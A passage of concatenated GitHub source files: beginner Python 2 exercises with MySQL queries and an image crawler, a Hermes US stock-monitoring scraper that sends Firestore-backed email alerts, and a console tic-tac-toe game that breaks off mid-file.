FIRST_NAME CHAR(20) NOT NULL,\n LAST_NAME CHAR(20),\n AGE INT, \n SEX CHAR(10),\n INCOME FLOAT)\"\"\"\n\n# cursor.execute(sql);\n\n\n# insert\ninsert_sql = \"\"\"insert into TEST_DB(FIRST_NAME,LAST_NAME,AGE,SEX,INCOME)VALUES ('arvin','Chang',26,'male',1000.0);\"\"\"\n\n# try:\n# count=0;\n# for index in range(1,20):\n# data=cursor.execute(insert_sql);\n# count+=data;\n# print count;\n# db.commit();\n# except Exception, e:\n# print 'str(Exception):\\t', str(Exception)\n# print 'str(e):\\t\\t', str(e)\n# print 'repr(e):\\t', repr(e)\n# print 'e.message:\\t', e.message\n# print 'traceback.print_exc():'; traceback.print_exc()\n# print 'traceback.format_exc():\\n%s' % traceback.format_exc()\n# db.rollback();\n\nupdate_sql = \"\"\"update TEST_DB set age=28\"\"\"\n# try:\n# data=cursor.execute(update_sql);\n# print data;\n# db.commit();\n# except Exception,e:\n# print 'str(Exception):\\t', str(Exception)\n# print 'str(e):\\t\\t', str(e)\n# print 'repr(e):\\t', repr(e)\n# print 'e.message:\\t', e.message\n# print 'traceback.print_exc():'; traceback.print_exc()\n# print 'traceback.format_exc():\\n%s' % traceback.format_exc()\n# db.rollback();\n\nquery_testdb_sql = \"\"\"select * from test_db\"\"\"\n\ntry:\n cursor.execute(query_testdb_sql);\n results = cursor.fetchall();\n\n list_test = list();\n\n for row in results:\n frist_name = row[0];\n last_name = row[1];\n age = row[2];\n sex = row[3];\n # print frist_name,sex;\n # testDB=TestDB;\n # testDB.first_name=frist_name;\n # testDB.last_name=last_name;\n # testDB.age=age;\n # list_test.__add__(testDB);\n li = {'first_name': frist_name, 'last_name': last_name, 'age': age, 'sex': sex};\n list_test.append(li);\n print list_test.__len__();\n print list_test;\n for li in list_test:\n if li.get('first_name') == 'arvin':\n print li.get('first_name')\n else:\n print 'false'\n\n if li.has_key('last_name'):\n print 'has key last_name'\n else:\n print 'not found key last_name'\nexcept Exception, e:\n print 'str(Exception):\\t', str(Exception)\n print 'str(e):\\t\\t', str(e)\n print 'repr(e):\\t', repr(e)\n print 'e.message:\\t', e.message\n print 'traceback.print_exc():';\n traceback.print_exc()\n print 'traceback.format_exc():\\n%s' % traceback.format_exc()\n db.rollback();\n\n# close connection\ndb.close();" }, { "alpha_fraction": 0.5072463750839233, "alphanum_fraction": 0.5507246255874634, "avg_line_length": 16.25, "blob_id": "015561534a5da184440a8a765ca25222b80a4870", "content_id": "3b8cf5673438f620d01a1a96058e0fa35055d2b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/App1/component/Script1.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding:UTF-8 -*-\n\ndef script1():\n print \"this is script 1\"\n" }, { "alpha_fraction": 0.4010416567325592, "alphanum_fraction": 0.40625, "avg_line_length": 8, "blob_id": "6a6744112f995624d18ef756dde21a322c379268", "content_id": "279836892b721cd45db9ffadbf1af7adee143b08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "no_license", "max_line_length": 38, "num_lines": 21, "path": "/App1/rename_images_script.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "#-*- coding: UTF-8 -*-\n\n'''\n读取指定目录下的所有文件对名字做修改\n'''\n\n\n# 遍历指定目录,显示目录下的所有文件名\n\n\n\nif __name__ == '__main__':\n\n print \"》》》》》》》》》》开始处理图片《《《《《《《《《《《《《\"\n\n\n\n\n\n\n print \"》》》》》》》》》》始处理图片结束《《《《《《《《《《《《\"\n\n\n\n" }, { "alpha_fraction": 0.47454702854156494, "alphanum_fraction": 0.5168248414993286, "avg_line_length": 16.560606002807617, "blob_id": "bcaf8e031ef4c9c69060286aa1dbda5fb72ec570", "content_id": "5f5e119060ff46ebefc42b35dda47f88ca4cbbf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1165, "license_type": "no_license", "max_line_length": 52, "num_lines": 66, "path": "/App1/functions/Utils.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: Utf-8 -*-\n\ndef funs():\n tuple1 = (\"1\", \"2\", \"3\", \"a\", \"b\", 0);\n\n print \"bulid in function\"\n print \"absolute value\", abs(-998)\n print \"all method:\", all(tuple1)\n for row in tuple1:\n\n if str == type(row):\n\n print ord(row)\n else:\n print \"not str\", row\n # hash code\n # print hash(row)\n print memoryview(row)\n\n\nclass Demo1(object):\n @staticmethod\n def outPrint():\n print \"this is static method\"\n\n\nclass Demo2(object):\n def outPrint(self):\n print \"this is general method\";\n\n\nclass Demo3(object):\n\n def __init__(self):\n pass\n\n\ndef sty_map():\n print map(lambda x: x * 10, [1, 3, 8, 9, 87])\n\n\ndef styFilter():\n print filter(lambda x:x>10,[10,19,18,29,8,9,23])\n\ndef sty_zip():\n tuple1=(1,2,3);\n tuple2 = (\"a\", \"b\", \"c\");\n tuple3 = (\"我\", \"是\", \"谁\");\n zipped=zip(tuple1, tuple2,tuple3)\n print zipped\n print zip(*zipped)\n\n\n\nif __name__ == '__main__':\n\n # funs()\n # static method\n # Demo1.outPrint()\n\n # general method\n # demo2 = Demo2()\n # demo2.outPrint()\n # sty_map()\n # styFilter()\n sty_zip()\n" }, { "alpha_fraction": 0.5072463750839233, "alphanum_fraction": 0.5507246255874634, "avg_line_length": 16.25, "blob_id": "212ac17449b59c6f0c461011cda4410de67b1658", "content_id": "28bc5ccf1d500df228a24eaf4871c501212cfc81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/App1/component/Script2.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding:UTF-8 -*-\n\ndef script2():\n print \"this is script 2\"\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.739130437374115, "avg_line_length": 10.5, "blob_id": "3a303cc56b30507fc4af8a16ed2455fa62e14da9", "content_id": "67d31cbf30f04ebe48bf085da80947b1b245d922", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/README.md", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# py-workspace\nstay py\n" }, { "alpha_fraction": 0.7246376872062683, "alphanum_fraction": 0.739130437374115, "avg_line_length": 22.33333396911621, "blob_id": "28c0833b18aa867fe0dd8723a02ebb5f0994eb91", "content_id": "c41ec21804ec6e1c4333841153a0a47d0ed1485f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 53, "num_lines": 3, "path": "/App1/Helloword.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# coding utf-8\n\nprint('hello world ,this is my first python pargram')" }, { "alpha_fraction": 0.5516840815544128, "alphanum_fraction": 0.5609756112098694, "avg_line_length": 19.5238094329834, "blob_id": "83c5475233b377a7d85a505cea31cd0ed76811b9", "content_id": "73b7bf196efc6f3aecfd8be358e0ab5f23024f7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 861, "license_type": "no_license", "max_line_length": 104, "num_lines": 42, "path": "/App1/DouBanCrawler.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# coding utf-8\nimport urllib\nimport re\nfrom __builtin__ import str\n\npath = \"/Users/arvin.chang/Images/webCrawler/\";\n\n\ndef getHTMLByURL(url):\n print url;\n page = urllib.urlopen(url);\n html = page.read();\n return html;\n\n\ndef getImg(html):\n # print html;\n reg = r'src=\"(.+?\\.jpg)\"'\n imgre = re.compile(reg);\n imgList = re.findall(imgre, html);\n print imgList;\n return imgList;\n\n\ndef wirteImg(imgList, x):\n y = 1;\n for imgurl in imgList:\n print imgurl\n z = str(x) + \"-\" + str(y);\n urllib.urlretrieve(imgurl, path + '%s.jpg' % z);\n y += 1;\n\n\ndef main():\n for index in range(1, 20):\n html = getHTMLByURL(\"http://www.dbmeinv.com/dbgroup/show.htm?cid=6&pager_offset=\" + str(index));\n # wirteImg(getImg(html),index);\n index += 1;\n\n\nif __name__ == '__main__':\n main();" }, { "alpha_fraction": 0.5561097264289856, "alphanum_fraction": 0.5660848021507263, "avg_line_length": 16.434782028198242, "blob_id": "c0befbf0bd2c8a6e002d77044a4913b8a58e095b", "content_id": "9655d3c0fbbe2208327b0919878797c92602229b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 401, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/App1/exception/styException.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: Utf-8 -*-\n\ndef styExc(args1):\n try:\n\n print \"\", int(args1)\n\n raise BussniessException,\"this is BussniessException\"\n\n except BaseException,e:\n print \"exception:\",e\n\n else:\n print \"no exception\"\n\n\nclass BussniessException(RuntimeError):\n def __init__(self, arg):\n self.args = arg\n print arg\n\nif __name__ == '__main__':\n styExc(5)\n" }, { "alpha_fraction": 0.543749988079071, "alphanum_fraction": 0.5687500238418579, "avg_line_length": 16.14285659790039, "blob_id": "8a81c7c426be19213c980a82ef88b7ccb7a35af8", "content_id": "197096cfb66fb63f1b628270c40f5aaec6344c09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 498, "license_type": "no_license", "max_line_length": 61, "num_lines": 28, "path": "/App1/ConnectionDB.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\n\nimport MySQLdb\n\n\ndef connctionMySQL():\n # open connection\n db = MySQLdb.connect(\"localhost\", \"py\", \"123456\", \"pydb\")\n\n # 用cursor()方法获取操作游标\n cursor = db.cursor()\n\n query_sql = \"\"\"select * from test_db limit 10\"\"\"\n\n cursor.execute(query_sql)\n\n results = cursor.fetchall ()\n\n for row in results:\n print row[2]\n print id(row[2])\n print row[4]\n\n # len\n print len(results)\n\n cursor.close()\n db.close()\n" } ]
15
zhouchangju1991/hermes_us
https://github.com/zhouchangju1991/hermes_us
30634da11de8e556f4ee7f53a79fc0f6cef91f38
07bf9f8ad98842149aab90aa430069aff681329c
c2879a24d1639cbec9a23c4c880a84b2ecfec9f3
refs/heads/master
2023-01-24T17:07:46.636476
2020-11-28T06:51:54
2020-11-28T06:51:54
316,663,841
4
4
null
null
null
null
null
[ { "alpha_fraction": 0.6459657549858093, "alphanum_fraction": 0.6459657549858093, "avg_line_length": 31.983871459960938, "blob_id": "13e2f2cad5d4cbb2736f17c30b9f794f01e4c514", "content_id": "28fd1496170ca4bce95d283cbf8d7efb919d7c19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4090, "license_type": "no_license", "max_line_length": 110, "num_lines": 124, "path": "/main.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pytz\nfrom crawler import Crawler\nfrom database import Database\nfrom mailer import Mailer\nfrom log import Log\n\n# Creates a log object. The log file name is today's date.\nlog = Log()\n\n# Create database object\ntry:\n database = Database()\nexcept Exception as exception:\n log.error('Fail to create Database object. Error message: {}'.format(exception))\n exit()\n\n# Create crawler object\ntry:\n crawler = Crawler()\nexcept Exception as exception:\n log.error('Fail to create Crawler object. Error message: {}'.format(exception))\n exit()\n\n# Create email object\ntry:\n mailer = Mailer()\nexcept Exception as exception:\n log.error('Fail to create Mailer object. Error message: {}'.format(exception))\n exit()\n\ndef main():\n keyword_docs = database.collection('hermes_us_keyword').where('is_valid', '==', True).stream()\n keywords = [doc.to_dict()['keyword'] for doc in keyword_docs]\n skus = []\n for keyword in keywords:\n for sku in crawler.fetch_skus_by_keyword(keyword):\n if sku in skus:\n continue\n product = crawler.fetch_product_by_sku(sku, keyword)\n if not product or not product['published']:\n log.info('{} is fetched while the product is out of stock'.format(sku))\n continue\n check_product(product)\n skus.append(sku)\n\n log.info('{} skus are fetched from {} keywords'.format(len(skus), len(keywords)))\n check_unpublish_products(keywords, skus)\n\ndef check_product(product):\n sku = product['sku']\n product_prev = database.document('hermes_us_product', sku).get().to_dict()\n\n if not product_prev:\n # Insert the product into the database if not exists\n create_product(product)\n mailer.send_email(product, 'published', product['updated_at'])\n elif not product_prev['published']:\n update_product_by_product(product, product_prev)\n mailer.send_email(product, 'republished', product['updated_at'])\n\ndef create_product(product):\n timestamp = product['updated_at']\n\n product['created_at'] = timestamp\n product['last_published_at'] = timestamp\n product['historical_publish'] = [{\n 'publish': True,\n 'timestamp': timestamp,\n }]\n product['published'] = True\n\n database.udpate_product_to_database(product, merge=False) \n\ndef update_product_by_product(product, product_prev):\n timestamp = product['updated_at']\n is_publish = product['published']\n\n if is_publish:\n product['last_published_at'] = timestamp\n\n product['historical_publish'] = product_prev['historical_publish']\n if is_publish != product_prev['published']:\n product['historical_publish'].append({\n 'publish': is_publish,\n 'timestamp': timestamp,\n })\n\n database.udpate_product_to_database(product, merge=False)\n\ndef update_product_publish_by_sku(sku, product_prev, is_publish):\n timestamp = datetime.now(pytz.timezone('US/Pacific'))\n product = {\n 'sku': sku,\n 'updated_at': timestamp,\n 'historical_publish': product_prev['historical_publish'],\n 'published': is_publish,\n }\n\n if is_publish:\n product['last_published_at'] = timestamp\n\n if is_publish != product_prev['published']:\n product['historical_publish'].append({\n 'publish': is_publish,\n 'timestamp': timestamp,\n })\n\n database.udpate_product_to_database(product, merge=True)\n\ndef check_unpublish_products(keywords, skus):\n timestamp = datetime.now(pytz.timezone('US/Pacific'))\n published_products_docs = database.collection('hermes_us_product').where('published', '==', True).stream()\n for doc in published_products_docs:\n product_prev = doc.to_dict()\n if product_prev['keyword'] not in keywords:\n continue\n sku = product_prev['sku']\n if sku not in skus:\n update_product_publish_by_sku(sku, product_prev, False)\n mailer.send_email(product_prev, 'unpublished', timestamp)\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.8081181049346924, "alphanum_fraction": 0.8081181049346924, "avg_line_length": 107.4000015258789, "blob_id": "fe475e93cd73d9f45ee0f51c589c60169a1fa017", "content_id": "2b04009c42408c9dba4db31b3ede4f8f4a9038c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 542, "license_type": "no_license", "max_line_length": 271, "num_lines": 5, "path": "/README.md", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "The project is built on Google Cloud Compute Engine. Credential-related files are ignored and not uploaded to github.\n\nThis project fetches the near real time stock information from Hermes US website and send notifications when some products are published/unpublished.\n\nmain.py contains the logic for the whole process. main() in main.py is scheduled to be called every minute. database.py is for read / write to firestore database. crawler.py is for crawling Hermes US website. mailer.py is for sending notifications. log.py is for logging.\n" }, { "alpha_fraction": 0.6256517171859741, "alphanum_fraction": 0.6277372241020203, "avg_line_length": 32.068965911865234, "blob_id": "84efc67eff9907f73522bb789935b594ac5984d2", "content_id": "25b85abded8bdf7afe2776576984234eb2c5449f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 959, "license_type": "no_license", "max_line_length": 103, "num_lines": 29, "path": "/upload_log_to_storage.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "import os, pytz\nfrom storage import Storage\nfrom datetime import datetime, timedelta\n\nstorage = Storage()\n\ndef upload_log():\n today_log = 'hermes_us_{}.log'.format(datetime.now(pytz.timezone('US/Pacific')).strftime('%Y%m%d'))\n log_dir = '{}/log/'.format(os.path.dirname(os.path.realpath(__file__)))\n for log_name in os.listdir(log_dir):\n if log_name >= today_log:\n continue\n source = '{}/{}'.format(log_dir, log_name)\n storage.upload_log(source, log_name)\n os.remove(source)\n\n# Removes logs that are created at or before gap_days ago.\ndef remove_old_logs(gap_days):\n date = datetime.now(pytz.timezone('US/Pacific')).strftime('%Y%m%d') - timedelta(days=gap_days)\n earlist_log = 'hermes_us_{}.log'.format(date)\n for log in storage.list_logs():\n if log < earlist_log:\n storage.delete_log(log)\n\nif __name__ == '__main__':\n gap_days = 30\n remove_old_logs(gap_days)\n\n upload_log()\n" }, { "alpha_fraction": 0.4976213276386261, "alphanum_fraction": 0.5004757642745972, "avg_line_length": 36.53571319580078, "blob_id": "161b589aa8cb781f5d378e05c76db2176c143f7e", "content_id": "a030be05bba6cc3419eef4011bded03b481d3320", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2102, "license_type": "no_license", "max_line_length": 111, "num_lines": 56, "path": "/mailer.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "import os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail, From, To, Subject, PlainTextContent, HtmlContent\nimport config\n\nclass Mailer:\n def __init__(self):\n self.__sg = SendGridAPIClient(config.send_grid_api_key)\n\n def send_email_base(self, from_email, to_emails, subject, html_content):\n message = Mail(from_email=From(from_email),\n to_emails=[To(to_email) for to_email in to_emails],\n subject=Subject(subject),\n html_content=HtmlContent(html_content))\n return self.__sg.send(message)\n\n def send_email_to_me(self, subject, html_content):\n return self.send_email_base(\n from_email='[email protected]',\n to_emails=['[email protected]'],\n subject=subject,\n html_content=html_content) \n\n def send_email(self, product, action, timestamp):\n time = '{} PT'.format(timestamp.strftime(\"%Y-%m-%d, %H:%M:%S\"))\n pattern = product['pattern']\n color = product['color']\n url = product['url']\n has_image = False\n if len(product['images']) > 0:\n has_image = True\n image = product['images'][0]\n\n subject = 'Hermes US {} {} - {} at {}'.format(action, pattern, color, time)\n if has_image:\n html_content = '''\n <div>\n <a href='{}' style='font-size:14px; font-weight:bold; color:black; text-decoration: none;'>\n {} - {}\n </a>\n </div>\n <br/>\n <div>\n <a href='{}'><img src='{}' /></a>\n </div>\n '''.format(url, pattern, color, url, image)\n else:\n html_content = '''\n <div>\n <a href='{}' style='font-size:14px; font-weight:bold; color:black; text-decoration: none;'>\n {} - {}\n </a>\n </div>\n '''.format(url, pattern, color)\n\n self.send_email_to_me(subject=subject, html_content=html_content)\n" }, { "alpha_fraction": 0.5734597444534302, "alphanum_fraction": 0.5876777172088623, "avg_line_length": 27.133333206176758, "blob_id": "5387b302ce67c1cea2fe0dba97503d413798ed65", "content_id": "8c90abab4eaf935e62c3e46ab107d1c7c54cbd1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "no_license", "max_line_length": 81, "num_lines": 30, "path": "/add_keyword_to_database.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pytz\nfrom database import Database\n\ndatabase = Database()\n\nkeywords = ['evelyne 16 amazone bag',\n 'herbag zip 31',\n 'picotin lock 18',\n 'picotin lock 22',\n 'kelly classique to go',\n 'lindy 26',\n 'lindy mini',\n 'roulis mini',\n 'roulis 23',\n 'rodeo',\n 'constance long to go',\n 'oran nano',]\nfor keyword in keywords:\n timestamp = datetime.now(pytz.timezone('US/Pacific'))\n document_name = keyword.lower().replace(' ', '_')\n data = {\n 'keyword': keyword,\n 'is_valid': True,\n 'created_at': timestamp,\n 'updated_at': timestamp,\n }\n\n if not database.document('hermes_us_keyword', document_name).get().to_dict():\n database.update_document('hermes_us_keyword', document_name, data, False)\n" }, { "alpha_fraction": 0.5730735063552856, "alphanum_fraction": 0.5876882076263428, "avg_line_length": 40.814815521240234, "blob_id": "09a0cbeb1e44f3ad4f2c0f0918055785cc4c76cf", "content_id": "6d3702a9f10f11601ceef6675c8cd2f61e73b26f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2258, "license_type": "no_license", "max_line_length": 137, "num_lines": 54, "path": "/crawler.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "import requests, json\nfrom datetime import datetime\nimport pytz\n\nclass Crawler:\n def __init__(self):\n self.__request_session = requests.Session()\n self.__request_headers = {\n 'accept-language': 'en-US,en;q=0.9',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n }\n\n def fetch_skus_by_keyword(self, keyword):\n skus = []\n initial_response = self.__get('https://bck.hermes.com/product?locale=us_en&searchterm={}'.format(keyword))\n products_num = json.loads(initial_response.text)['total']\n offset = 0\n while offset < products_num:\n products_response = self.__get('https://bck.hermes.com/product?locale=us_en&searchterm={}&offset={}'.format(keyword, offset))\n products_json = json.loads(products_response.text)\n products = products_json['products']['items']\n for product in products:\n skus.append(product['sku'])\n offset += 36\n\n return skus\n\n def fetch_product_by_sku(self, sku, keyword):\n response = self.__get('https://bck.hermes.com/product-page?locale=us_en&productsku={}'.format(sku))\n product_json = json.loads(response.text)\n product = {\n 'sku': sku,\n 'pattern': formalize(product_json['title']),\n 'images': ['https:{}'.format(image['url']) for image in product_json['assets']],\n 'price': product_json['price'],\n 'url': 'https://www.hermes.com{}'.format(product_json['url']),\n 'slug': formalize(product_json['slug']),\n 'published': product_json['hasStock'],\n 'description_html': product_json['simpleAttributes']['description'],\n 'dimension': product_json['simpleAttributes']['dimensions'],\n 'color': product_json['simpleAttributes']['colorHermes'],\n 'updated_at': datetime.now(pytz.timezone('US/Pacific')),\n 'keyword': keyword,\n }\n\n return product\n\n def __get(self, url):\n return self.__request_session.get(url, headers=self.__request_headers)\n\ndef formalize(s):\n if None == s or '' == s:\n return ''\n return s.lower().strip()\n" }, { "alpha_fraction": 0.6853448152542114, "alphanum_fraction": 0.6853448152542114, "avg_line_length": 34.69230651855469, "blob_id": "92aafb024208cebcf2cd8d9478afe2957d92586d", "content_id": "3c1a7cbc03aaad58c53703ddb54b88705d979915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 101, "num_lines": 26, "path": "/storage.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "from google.cloud import storage\nimport config\n\nlog_bucket_name = 'nanazhou_hermes_us_log'\n\nclass Storage:\n def __init__(self):\n self.__client = storage.Client.from_service_account_json(config.service_credential_file_name)\n \n def upload(self, bucket_name, source_file_name, destination_file_name):\n bucket = self.__client.bucket(bucket_name)\n destination = bucket.blob(destination_file_name)\n destination.upload_from_filename(source_file_name)\n\n def upload_log(self, source_file_name, destination_file_name):\n self.upload(log_bucket_name, source_file_name, destination_file_name)\n\n def delete(self, bucket_name, blob_name):\n blob = self.__client.bucket(bucket_name).blob(blob_name)\n blob.delete()\n\n def delete_log(self, log_name):\n self.delete(log_bucket_name, log_name)\n\n def list_logs(self):\n return self.__client.list_blobs(log_bucket_name)\n" }, { "alpha_fraction": 0.5947888493537903, "alphanum_fraction": 0.5947888493537903, "avg_line_length": 32.69696807861328, "blob_id": "fcdeae58e85711a6ffca0067fa08e6b44a76b34b", "content_id": "28e1be3774aac796d9f8eb56a187a3fe2d1dda83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1113, "license_type": "no_license", "max_line_length": 104, "num_lines": 33, "path": "/log.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport logging, pytz, os\nfrom pytz import timezone, utc\n\nclass Log:\n def __init__(self):\n today = datetime.now(pytz.timezone('US/Pacific')).strftime('%Y%m%d')\n file_name = '{}/log/hermes_us_{}.log'.format(os.path.dirname(os.path.realpath(__file__)), today)\n logging.basicConfig(filename=file_name,\n filemode='a',\n level=logging.INFO,\n format=\"%(asctime)s %(levelname)s: %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\")\n logging.Formatter.converter = self.__PacificTime\n self.__logger = logging.getLogger(__name__)\n\n def __PacificTime(*args):\n utc_dt = utc.localize(datetime.utcnow())\n pt_tz = timezone(\"US/Pacific\")\n converted = utc_dt.astimezone(pt_tz)\n return converted.timetuple()\n\n def debug(self, message):\n self.__logger.debug(message)\n\n def info(self, message):\n self.__logger.info(message)\n\n def warning(self, message):\n self.__logger.warning(message)\n\n def error(self, message):\n self.__logger.error(message)\n\n" }, { "alpha_fraction": 0.703406810760498, "alphanum_fraction": 0.703406810760498, "avg_line_length": 37.38461685180664, "blob_id": "60c4e8b72043e2e4413a9105d6ea7bf24f63ffe4", "content_id": "1c6ba1b5865d92e705a6140ae48810daddcc8f48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 998, "license_type": "no_license", "max_line_length": 81, "num_lines": 26, "path": "/database.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport config\n\nclass Database:\n def __init__(self):\n # fetch credential from the private key and get database instance.\n cred = credentials.Certificate(config.service_credential_file_name)\n firebase_admin.initialize_app(cred)\n self.db = firestore.client()\n\n def udpate_product_to_database(self, product, merge):\n self.update_document('hermes_us_product', product['sku'], product, merge)\n\n def update_document(self, collection_name, document_name, data, merge):\n if merge:\n self.document(collection_name, document_name).update(data)\n else:\n self.document(collection_name, document_name).set(data)\n\n def collection(self, collection_name):\n return self.db.collection(collection_name)\n\n def document(self, collection_name, document_name):\n return self.collection(collection_name).document(document_name)\n" } ]
9
RituSin/TicTacToe
https://github.com/RituSin/TicTacToe
a3cfbabd4b759d0af22a68ab673e1eeb9a072579
b1c8415c3291bf9083819e0c3e092b402a473add
74eda659d40b2034d2b20464dd13681a6396414a
refs/heads/master
2022-07-10T00:46:24.767515
2020-05-19T13:28:02
2020-05-19T13:28:02
265,251,184
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5655582547187805, "alphanum_fraction": 0.5839415788650513, "avg_line_length": 23.390727996826172, "blob_id": "d753a37f040eba731bea6b73e66a20e8f386d1f2", "content_id": "29b4bd5bd073c8f1cccb98439b7f30b8647a0e32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3699, "license_type": "no_license", "max_line_length": 73, "num_lines": 151, "path": "/TicTacToe.py", "repo_name": "RituSin/TicTacToe", "src_encoding": "UTF-8", "text": "#from IPython.display import clear_output\nimport random\n\ndef display_board(mylist):\n\t#clear_output()\n\tprint('\\n'*100)\n\tprint(' | | ')\n\tprint(' '+mylist[7] + ' | '+mylist[8]+' | '+mylist[9]+' ')\n\tprint(' | | ')\n\tprint('-----------------')\n\tprint(' | | ')\n\tprint(' '+mylist[4] + ' | '+mylist[5]+' | '+mylist[6]+' ')\n\tprint(' | | ')\n\tprint('-----------------')\n\tprint(' | | ')\n\tprint(' '+mylist[1] + ' | '+mylist[2]+' | '+mylist[3]+' ')\n\tprint(' | | ')\n\t\ndef player_input():\n\tmarker= False\n\twhile marker not in ['X','O']:\n\t\tprint('Player 1: Do You want X or O? ')\n\t\tmarker = input()\n\tif(marker == 'X'):\n\t\treturn ('X','O')\n\telse:\n\t\treturn ('O','X')\t\n\t\t\t\ndef place_marker(Test_board,marker,position):\t\n\tTest_board[position]= marker\n\tdisplay_board(Test_board)\t\n\ndef win_check(board,mark):\n\treturn (\n\t(board[1] == board[2] == board[3] == mark)or #row\n\t(board[4] == board[5] == board[6] == mark)or #row\n\t(board[7] == board[8] == board[9] == mark)or #row\n\t(board[1] == board[4] == board[7] == mark)or #column\n\t(board[2] == board[5] == board[8] == mark)or #column\n\t(board[3] == board[6] == board[9] == mark)or #column\n\t(board[7] == board[5] == board[3] == mark)or #dig\n\t(board[1] == board[5] == board[9] == mark) #dig\n\t)\t\n\t\ndef choose_first():\n\tflip = random.randint(0,1)\n\tif(flip == 0):\n\t\treturn 'Player 1'\n\telse:\n\t\treturn 'Player 2'\n\n\n#if space in the board is freely available\ndef space_check(board,position):\n\treturn board[position] == ' ' \n\t\n#if the board full return true\ndef full_board_check(board):\n\tfor i in range(1,10):\n\t\tif(space_check(board,i)):\n\t\t\treturn False\n\t\t\n\treturn True\t\n\t\n#Player's move\t\ndef player_choice(board,turn):\n\tpos = 0\n\twhile pos not in [1,2,3,4,5,6,7,8,9] or not space_check(board,pos):\n\t\tpos = int(input(turn + ' choose num between 1-9: '))\n\treturn pos\t\n\t\t\t\n#ask player if they want to play again\ndef reply():\n\treturn input('want to play again? select Yes otherwise No : ')\t== 'Yes'\t\n\n\n#while loop to keep running the game\nprint('Welcome to Tic Tac Toe\\n')\n\nwhile True:\n\t#Play the game.\n\n\t##Set everything up-> board<choose marker<whose first\n\tthe_board = [' ']*10\n\tPlayer1marker, Player2marker = player_input()\n\tturn = choose_first()\n\t\n\tprint(turn + ' Goes first!!!\\n')\n\tPlayGame = input('Ready to play? y or n: ')\n\tif(PlayGame == 'y'):\n\t\tGameON = True\n\telse:\n\t\tGameON = False\n\t\t\n\t#Game play\n\twhile GameON:\n\t\tif turn == 'Player 1':\n\t\t\t##Player one turn\n\t\t\t\n\t\t\t#show the board\n\t\t\tdisplay_board(the_board)\n\t\t\t\n\t\t\t#choose a position\n\t\t\tpos = player_choice(the_board,turn)\n\t\t\t\n\t\t\t#place the marker on the position\n\t\t\tplace_marker(the_board,Player1marker,pos)\n\t\t\t\n\t\t\t#check if they won\n\t\t\tif win_check(the_board,Player1marker):\n\t\t\t\tdisplay_board(the_board)\n\t\t\t\tprint(turn + ' wins\\n')\n\t\t\t\tGameON = False\n\t\t\telse:\n\t\t\t\t#or check if there is a 